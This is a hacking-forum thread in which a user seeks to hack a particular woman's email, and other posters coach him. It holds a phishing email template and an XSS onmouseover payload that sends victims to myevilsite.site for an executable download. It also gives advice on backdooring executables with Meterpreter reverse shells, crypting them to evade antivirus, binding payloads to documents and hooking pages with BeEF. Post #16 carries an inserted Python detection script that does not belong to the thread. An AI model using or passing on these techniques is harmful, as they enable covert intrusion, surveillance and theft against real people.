How Can I Use Kali Linux To Hack Email
#11
@Vector, hats off to you bro. I will check out peCloakCapstone and see how it works, and will give you an update after I build an exe, encrypt it with peCloakCapstone and perform a run-time check. If it bypasses the mainstream AV, then it could be you have given me the solution I yearned for.
#12
1. Kali should only ever be used on a bootable USB when you have access to the network you're trying to infiltrate.
2. Hacking emails is a bit of a "social" construct, so you should go that route.
3. You can do everything on a simple Ubuntu disk that you can do on a Kali distro; since they are both Debian based, they have the same makeup.
#13
@ekultek thanks for chipping in, and for pointing me to yet another SE direction. Let me ask, if you were in my shoes, where would you begin with the SE construct? Thanks for the kind answers.

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloakCapstone and try to avoid AV solutions with that.

I have tried to install peCloakCapstone; it is giving me a hard time because their GitHub page did not specify how to install it. I have tried every possible way I know to install stuff in Kali, but so far I have failed. I will keep Mr Google busy on that front until I am able to install it.
#14
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and for pointing me to yet another SE direction. Let me ask, if you were in my shoes, where would you begin with the SE construct? Thanks for the kind answers.

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloakCapstone and try to avoid AV solutions with that.

I have tried to install peCloakCapstone; it is giving me a hard time because their GitHub page did not specify how to install it. I have tried every possible way I know to install stuff in Kali, but so far I have failed. I will keep Mr Google busy on that front until I am able to install it.

It's a Python script. Go to the directory where your peCloak copy lives, then open a terminal in there and type:

Code:
python [script name].py
#15
@ekultek thanks again. I already know that the .py extension is Python and that I must start the installation of any file with that extension with 'python'. But this 'peCloakCapstone' file has a .sh extension; I have tried the installation with ./, with bash and with sudo, and none seems to work, and there is no word or instruction on how to install it. I git cloned it to a desktop folder I named tools, so I first cd into desktop and then the tools folder. Perhaps I'll download the file again, this time directly, and then extract and install; maybe it will work that way.
Also, I seem to have found a solution. I created and encrypted the payload yesterday, then tested it on one of my physical machines that has Windows 10 with NOD32 and Malwarebytes installed. I launched the payload and got a connection; neither NOD32 nor Malwarebytes could detect it for 5 hours. What I need now is how to bind the payload to a .docs file and rename it as invoicexe.docs before sending it to the target.
Do you know how I can bind a payload to a .docs file in Kali? Or what tool I can use to bind the payload so that it still remains FUD? Thank you once again for reliable instructions and willingness to help.
#16
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and for pointing me to yet another SE direction. Let me ask, if you were in my shoes, where would you begin with the SE construct? Thanks for the kind answers.

I would begin by creating a believable document or error or something and emailing it to a group of users as an educational training sort of thing. From there I would use an XSS-vulnerable site to put an onmouseover on something they are guaranteed to mouse over and redirect it to a server that downloads a file and executes itself.

For example, let's say they are doing some sort of security training;

Example email:
Code:
Hello <insert email here> (usually on corporate networks you can get pretty close to the user's name from their email address; a lot of them use <LASTNAME>.<MIDDLE INITIAL>.<FIRST NAME>@<SERVER>.<EXT>)

Your security training has been moved to today, please follow this <HYPER-LINK-TO-REDIRECT-SITE> to get started.

Sincerely,
  IT Support

Once they have clicked that link, there will be code executed in the browser, and when they roll over, let's say, the banner image, it will redirect them to whatever site I wish using something along the lines of;
Code:
<b onmouseover=window.location='https://myevilsite.site/pumpedupkicks.exe'>Please follow this link for the training</b> (You can also encode this using HTTP equivs and decode it on execution using #eval().)

After my dropper is in (if it works), set up the reverse TCP and do my thing.

This is just an example, but it should give you a pretty decent idea of what you need to do. The trick is to keep trying and use different approaches. A lot of people do phishing training, but not a lot do whale phishing training. So if you can get pictures of emails, spoof to something close, and get some good-looking fake creds, you should be set.

On a side note you could also use the SEToolkit located here: https://github.com/trustedsec/social-engineer-toolkit
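A defender-side check for the rollover redirect described in the post above, added here as an example and not part of the original thread: it parses an HTML mail body with Python's standard-library html.parser and flags inline event handlers that navigate the page or reference an executable download, the pattern a mail gateway or link-rewriting proxy would want to catch. The sample HTML is constructed (the first tag is the snippet from the post); the executable-extension list and the set of handler attributes are assumptions you would tune.

```python
import re
from html.parser import HTMLParser

# Assumed lists: inline handler attributes to inspect, and extensions that mean "a download that runs".
EVENT_ATTRS = {"onmouseover", "onmouseenter", "onclick", "onload", "onerror", "onfocus"}
NAV_RE = re.compile(r"(window\.)?location(\.href)?\s*=|location\.(assign|replace)\s*\(", re.I)
EXEC_URL_RE = re.compile(r"https?://[^\s'\"]+\.(exe|scr|msi|hta|js|vbs|bat|cmd|ps1)\b", re.I)


class HandlerScanner(HTMLParser):
    """Collect inline event handlers that navigate, plus any executable URLs they name.

    html.parser unescapes attribute values before handing them to us, so an entity-encoded
    handler (the "encode it" trick from the post) is scanned in its decoded form.
    """

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() not in EVENT_ATTRS or not value:
                continue
            navigates = bool(NAV_RE.search(value))
            exe_urls = [m.group(0) for m in EXEC_URL_RE.finditer(value)]
            if navigates or exe_urls:
                self.findings.append({"tag": tag, "attr": name.lower(),
                                      "navigates": navigates, "exe_urls": exe_urls})


def scan_html(html):
    """Return a list of suspicious inline-handler findings for one HTML body."""
    parser = HandlerScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the post's snippet, an entity-encoded variant, a benign link and a benign handler.
SAMPLE_EMAIL_HTML = (
    "<p>Your security training has been moved to today.</p>"
    "<b onmouseover=window.location='https://myevilsite.site/pumpedupkicks.exe'>Please follow this link for the training</b>"
    "<img src=\"banner.png\" onmouseover=\"&#119;indow.location='https://example.invalid/update.scr'\">"
    "<a href=\"https://example.invalid/training\">Training portal</a>"
    "<div onclick=\"toggleMenu()\">Menu</div>"
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_EMAIL_HTML):
        print(f"<{f['tag']} {f['attr']}> navigates={f['navigates']} exe_urls={f['exe_urls']}")
```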
#17
(02-28-2018, 11:41 PM)ekultek Wrote: I would begin by creating a believable document or error or something and emailing it to a group of users as an educational training sort of thing. From there I would use an XSS-vulnerable site to put an onmouseover on something they are guaranteed to mouse over and redirect it to a server that downloads a file and executes itself.

Thank you so very much. I have been trying to do the same using BeEF in Kali. I know the page she visits quite often, so I can clone the page, insert the BeEF hook JS, shorten the hook link and send it over to her. But I have been grappling with getting BeEF to work with ngrok or a VPN so I can do that without using my internal IP. Any ideas? I got this tutorial https://hackforums.net/showthread.php?ti...id56752029 and am going to try it out now. It's been exhausting trying to get ngrok or a VPN to work with BeEF, Metasploit or SEToolkit without having to go into my router settings. I will try the above. Overall, I really thank you for a very meaningful, positive and really engaging response.

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloakCapstone and try to avoid AV solutions with that.

Sir, I have not slept in about 18 hours, so when I sent in the last reply regarding peCloakCapstone I was already mentally exhausted and was in the wrong folder. Apologies. I got it working and encrypted a payload; the resulting scan from viruscheckmate.com was very disheartening: 21/31 detections.
#18
(03-01-2018, 09:58 AM)code419 Wrote: Sir, I have not slept in about 18 hours, so when I sent in the last reply regarding peCloakCapstone I was already mentally exhausted and was in the wrong folder. Apologies. I got it working and encrypted a payload; the resulting scan from viruscheckmate.com was very disheartening: 21/31 detections.

Let's try https://github.com/pasahitz/zirikatu
#19
I will try that as well, though I suspect it will no longer be FUD, as I have seen several tutorials on it already in the past, since last year. This means it has been tried already by thousands of people like me, and some stupid ones have scanned the result already, several times, at VirusTotal, and all the AVs have the signature already. Nevertheless, I will try it in a few minutes, and I must really thank all you guys for very willing and heartfelt help. I'm only days old here, and it feels like I have been part of your community for a long time. Thanks again, and I'd like to ask if you know any good way I can embed/bind a payload to a .docs file. I have been asking Mr Google this question since the morning hours, in different ways, and the answers Mr Google is bringing forth aren't very satisfactory or specific.
#20
(03-02-2018, 09:26 PM)code419 Wrote: I will try that as well, though I suspect it will no longer be FUD, as I have seen several tutorials on it already in the past, since last year. This means it has been tried already by thousands of people like me, and some stupid ones have scanned the result already, several times, at VirusTotal, and all the AVs have the signature already. Nevertheless, I will try it in a few minutes, and I must really thank all you guys for very willing and heartfelt help. I'm only days old here, and it feels like I have been part of your community for a long time. Thanks again, and I'd like to ask if you know any good way I can embed/bind a payload to a .docs file. I have been asking Mr Google this question since the morning hours, in different ways, and the answers Mr Google is bringing forth aren't very satisfactory or specific.

Man, I don't know what you are trying to make FUD, but I'm gonna give you some tips.
You might want to get into binary modding. From what you said, I think you already know how AVs detect malware, so maybe try some signature fucker/zero or something like AV fucker.

Use command-line AVs to use less memory, and check that the version allows the signature fucker method. Some of them detect that you are doing this and stop giving you good results (e.g. NOD32 after version 4).

DSplit might also be interesting; you can even use both at the same time.

Make your own crypter, or don't use a saturated one. Some packers are automatically detected, so do your research first. And in case you're using AutoIT, it's basically the same thing: auto-detected just for the AutoIT interpreter.

Use code obfuscation too. There are several methods used in the wild; you can convert the code to Unicode or whatever, and the analyst will have to use a hex editor, which is a pain in the ass imo.
You can also make variables for the alphabet letters, making the text totally illegible.

If you want, you can use .vbs, which will give you trust because it's run by the Windows Scripting Host. However, just like AutoIT, some AVs will detect you automatically, in this case just for using certain functions. At the moment I don't remember which ones exactly, but you can research that in case you're interested.

Finally, you should look into some polymorphic engines.

That's just for scantime, but there is a lot more for runtime.
Try those methods; it should suffice for most AVs.

That's all for making it FUD. For making docs... don't use the actual file, use droppers instead, or if you get detected you get automatically fucked and all your work on making it FUD gets lost. Doc files use VBA, so check that instead and it will give you a lot of results.

Good luck man!